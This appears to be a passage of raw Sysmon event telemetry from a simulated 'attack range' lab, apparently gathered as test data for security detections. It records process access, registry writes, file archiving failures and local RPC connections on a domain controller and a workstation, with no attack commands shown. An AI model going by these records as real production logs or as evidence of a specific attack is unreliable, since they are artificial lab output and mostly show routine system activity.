Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC2290D71BEEE6CAA1793E3CC97208B9,SHA256=A17BD9F9978B0E8F6847013EA6E7252F1A716ACE231595C39CE711F9822E24AE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000040227Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:06.283{FE4C2B44-DDF7-63C7-B604-00000000AF02}37882252C:\Windows\system32\taskhostw.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d742|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000015417Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:07.193{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B92B224665D1D9003B511C3FF273A641,SHA256=338718E64EAEFCC9850F6B1B3B43A9E043A26C4E665C215DBF7205401CF4539E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000040230Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:07.406{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29EB23EBA1275B6FA1FC106EB40B32E3,SHA256=EC8F32512DB66BB98D145E1C3EFE474144F96490BD88F215EE57E0340CB1ED66,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015418Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:08.300{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC59FD03636D14C4D2F1715899CD3240,SHA256=4ED4072456DA7EBEB745EC851557D58531D42357E6351FCAF87929EF77FD7141,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000040236Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:18:08.956{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\6335A056-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_6335A056-0000-0000-0000-100000000000.XML 13241300x800000000000000040235Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:18:08.940{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\ADB99FA2-9D1A-4D48-BBCB-43A33DB3514B\Config SourceDWORD (0x00000001) 13241300x800000000000000040234Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:18:08.940{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\ADB99FA2-9D1A-4D48-BBCB-43A33DB3514B\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_ADB99FA2-9D1A-4D48-BBCB-43A33DB3514B.XML 10341000x800000000000000040233Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:08.940{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040232Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:08.940{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000040231Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:08.486{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72B63CAF8F431B22671C990AD5617ADB,SHA256=26D272718C876F8F024A8912642B64CDE376FB6C7DE380645E09C3DB4E4FF084,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000040240Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:09.793{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040239Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:09.793{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040238Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:09.793{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000040237Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:09.559{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2FF74DAF87F87691D380B93F6A8B923B,SHA256=7D023EC06909727DE40A79CA3763646DA23CA65BFDDFAA686796B46A38B66CB6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015419Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:09.390{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0861D7DE21D31CF25DD4C65FB3CC2146,SHA256=F0087B4EC5068A55E53D772F8395AF84D3456B763E1C910B518AD2CB86621018,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000040256Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:10.853{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D63BF3F712B4375882C83EECC98DF980,SHA256=71AFD9CC279B9CB37502D589A76C78748F0D9997C9F89549F1A44D97CEEAD611,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000040255Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:10.806{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040254Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:10.806{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040253Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:10.634{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000040252Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:10.634{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8889D59BFFA5CD0693E82479388F35A8,SHA256=BCA2721D6ECE9EE3465F2E1A659679B39965967E88A4A1AD9D667DD23CFA334A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000040251Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:10.634{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040250Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:10.634{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040249Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:10.572{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005288C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8a4a5|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040248Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:10.572{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005288C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8a3be|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040247Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:10.572{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005288C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8a387|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000015420Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:10.484{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F7EFAB9131BD3029B9BBBE440C88E83,SHA256=F495A9987B566106E28F8A6A5D27662F09DFEAD50F3FD4EACEF456144FF8F9E1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000040246Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:10.541{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8ab30|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040245Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:10.541{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+1078f0|C:\Windows\System32\SHELL32.dll+8aaec|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040244Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:10.541{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8aac0|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040243Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:10.541{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\TwinUI.dll+12ccb9|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x800000000000000040242Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:08.429{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:8599:7e7b:594b:6e25win-dc-ctus-attack-range-271.attackrange.local56240-truefe80:0:0:0:8599:7e7b:594b:6e25win-dc-ctus-attack-range-271.attackrange.local135epmap 354300x800000000000000040241Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:08.429{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8599:7e7b:594b:6e25win-dc-ctus-attack-range-271.attackrange.local56240-truefe80:0:0:0:8599:7e7b:594b:6e25win-dc-ctus-attack-range-271.attackrange.local135epmap 10341000x800000000000000040285Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:11.886{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\system32\dns.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040284Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:11.884{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2400-00000000AF02}2492C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program 